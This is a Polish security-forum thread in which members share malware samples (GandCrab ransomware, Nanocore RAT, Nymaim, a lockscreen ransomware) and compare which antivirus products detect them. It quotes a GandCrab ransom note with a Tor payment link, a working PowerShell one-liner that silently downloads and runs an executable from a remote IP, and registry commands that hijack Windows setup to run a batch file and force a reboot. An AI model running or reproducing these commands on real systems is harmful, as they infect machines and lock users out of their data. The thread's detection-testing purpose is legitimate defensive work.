Paczki, malware, złośliwe pliki, linki itp.
Plik uszkodzony nie mogę rozpakować :/ pobierałem z 2 razy..
Warstwy ochrony

1)Ograniczenie/blokowanie dostępu do danych/aplikacji
2)Odizolowanie i tworzenie osobnych baz danych/aplikacji
3)Kopia zapasowa systemu/ważnych danych.
4)Wykrywanie i kasowanie wirusów/złośliwych aplikacji.
Odpowiedz
Spróbuj jeszcze raz.
Odpowiedz
ok teraz działa

SAP wykrywa (eset + Apex)
Zemana wykrywa
MBAM wykrywa
Warstwy ochrony

1)Ograniczenie/blokowanie dostępu do danych/aplikacji
2)Odizolowanie i tworzenie osobnych baz danych/aplikacji
3)Kopia zapasowa systemu/ważnych danych.
4)Wykrywanie i kasowanie wirusów/złośliwych aplikacji.
Odpowiedz
Wirus całkowicie ubił Windows Defendera Teoretycznie wykrył sygnaturą ale jego składowe ubiły Defendera
Post sprawdzony przez  MKS_VIR


Odpowiedz
MKS _Vir wykrywa po rozpakowaniu
Odpowiedz
Ransomware_GandCrab 5.0.2

[Obrazek: wt9BolD.jpg]

Kod:
---=    GANDCRAB V5.0.2  =---

***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************

    *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE WILL BE DECRYPTION ERRORS*****

Attention!

All your files, documents, photos, databases and other important files are encrypted and have the extension: .SOMIIAV      

The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.


The server with your key is in a closed network TOR. You can get there by the following ways:

----------------------------------------------------------------------------------------

| 0. Download Tor browser - https://www.torproject.org/

| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser:   http://gandcrabmfe6mnef.onion/9dc82d5d88f3574b                        
| 4. Follow the instructions on this page

----------------------------------------------------------------------------------------                    
   

On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.


ATTENTION!

IN ORDER TO PREVENT DATA DAMAGE:

* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW

---BEGIN GANDCRAB KEY---
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
---END GANDCRAB KEY---

---BEGIN PC DATA---
wfKD6iudumBkmpL8IRr4U7KxFFamOXPtnDwmOrT1y1YWvOiWMx5GYaRdvZZTTpJRrXYU7mxWqrfFTAyHkx5XBMfzudM274X6eEHBDDniDpJO89rFN//AmFuoI5B0Lo+j+Pxp2XHxFJKzioGhekSJAvkAi7ZIONmX7LnVbV4kbXRqbZiWp8DjYalYZqTHxtcpFY4S29mAQVKuZBlVvAObuQjcNCJl2M2MJ0O6MKwP2IpPLAOTPJxVmtooRHZiP6A/SvqD1pZz1DaljedAG3gil5RnEd05CBIxSw7QDMkr9X00SmPFCQ+oka0tOdi8qcGns7r357BijLErkRzB7eKt/zI2QusuGtlYOFqGBnPtpRHeEY8boicX4t64P6azY91yMYz32S+izJRoTWUqGFPGJOoJ1pEcwL0oAhPMnK8+De5XALufimEzg65rLg3txBFKwQ7+ZirpCxFL3vHLMuat1w4ZMHQQRkOKJTmF1lzgdX8ImU/fjiyxQQxnz7JBlpawv3IDVYvpfTf1fAIcOsA2PzRNwX8PQy7ChaZPEubtMkioBZdMb5HjHssOL7+KRYAP+4kgV67utbOZzJr9ZHY=
---END PC DATA---

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
Secureaplus wykrywa po rozpakowaniu (silnik APEX).
Odpowiedz
MKS_Vir wykrywa po rozpakowaniu
Odpowiedz
Windows Defender Wykrywa przy rozpakowaniu
Post sprawdzony przez  MKS_VIR


Odpowiedz
RAT_Nanocore

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
MKS_Vir nie wykrywa - plik przesłany do analizy
Odpowiedz
SAP - wykrywa / Apex avira eset
Mbam - wykrywa
Zemana - nie wykrywa
Warstwy ochrony

1)Ograniczenie/blokowanie dostępu do danych/aplikacji
2)Odizolowanie i tworzenie osobnych baz danych/aplikacji
3)Kopia zapasowa systemu/ważnych danych.
4)Wykrywanie i kasowanie wirusów/złośliwych aplikacji.
Odpowiedz
Defender wykrywa jako Trojan:Win32/Sonbokli.A!cl
Post sprawdzony przez  MKS_VIR


Odpowiedz
[Malware Pack] 2018-10-15 #43

Treść widoczna jedynie dla zarejestrowanych użytkowników
KIS2019, MBAM1.75, HitmanPro, Eset Online, FF+uBlock, MBAE1.12, ZAM2.74
#error404

Odpowiedz
SecureAPlus wykrył wszystkie.
Odpowiedz
Defender nie wykrywa 2 plików wysłałem do ich labu
Post sprawdzony przez  MKS_VIR


Odpowiedz
Crystal i MKs_vir koszą wszystkie pliki
Odpowiedz
Nymaim_(PowerShell)

Kod:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";;;;;$peDirectURL = 'http://205.185.125.244/1.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";;;;;$peDirectURL = 'http://205.185.125.244/1.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;;""


Treść widoczna jedynie dla zarejestrowanych użytkowników


VirusScope Comodo wykrywa po uruchomieniu.
Odpowiedz
Jakiś Ransom LockScreen

Treść widoczna jedynie dla zarejestrowanych użytkowników


[Obrazek: yp8IF8T.png]

Dropped files

C:\setup.bat
C:\clear.bat
C:\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\clear.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\init.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\setup.bat

Rejestr:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000000040000003800450000003800000038E000000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v SetupType /t REG_DWORD /d 2 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v CmdLine /t REG_SZ /d "cmd.exe /C C:\setup.bat" /f

write:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout
HKEY_LOCAL_MACHINE\SYSTEM\Setup

Czynności: Dostęp do interfejsu com Kierunek: LocalSecurityAuthority.Shutdown co doprowadza do restartu CMD shutdown -r -t 35 -f i blokady ekranu.
Odpowiedz
MKS kosi te pliki
Odpowiedz




Użytkownicy przeglądający ten wątek: 1 gości